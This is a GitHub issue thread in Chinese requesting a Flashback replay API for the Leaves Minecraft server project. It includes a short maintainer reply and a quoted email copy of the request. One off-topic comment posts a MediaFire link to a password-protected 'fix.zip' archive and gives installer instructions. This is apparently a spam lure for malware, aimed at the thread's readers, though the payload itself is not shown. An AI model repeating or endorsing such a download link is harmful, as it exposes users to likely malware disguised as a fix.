### ISSUE TITLE
是否可以考虑添加新的玩家回放api

### ISSUE THREAD

**Issue by Virgil692** [LeavesMC/Leaves#326]
## 大致描述功能：
- Flashback回放文件所占用磁盘大小会比Replaymod回放文件小1/5
- Flashback相对于Replaymod，它会随时保存录制数据
- Flashback使用方便快捷，优化比Replaymod好

## 以下是我偷懒找KimiAI总结的内容：

根据视频内容，Flashback模组相比于ReplayMod的优势可能在于：
- 更先进的录制和回放技术。
- 更多的自定义选项，如关键帧控制和缩时功能。
- 更好的用户界面和操作体验。

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by s-yh-china** [comment]
等会看看



---原始邮件---
发件人: ***@***.***&gt;
发送时间: 2024年8月28日(周三) 中午1:09
收件人: ***@***.***&gt;;
抄送: ***@***.***&gt;;
主题: [LeavesMC/Leaves] 是否可以考虑添加新的玩家回放api (Issue #326)




 
描述你希望添加的功能。 Describe the feature you'd like.
 
新的回放模组：Flashback
 
视频：【2024最強模組！Minecraft主播必備的錄影模組！把遊戲變成剪輯軟體！？-哔哩哔哩】 https://b23.tv/sBfdAVU
 
大致描述功能：
  
Flashback回放文件所占用磁盘大小会比Replaymod回放文件小1/5 

Flashback相对于Replaymod，它会随时保存录制数据 

Flashback使用方便快捷，优化比Replaymod好 
 
以下是我偷懒找KimiAI总结的内容：
 
根据视频内容，Flashback模组相比于ReplayMod的优势可能在于：
  
更先进的录制和回放技术。 

更多的自定义选项，如关键帧控制和缩时功能。 

更好的用户界面和操作体验。 
 
其他 Other
 
No response
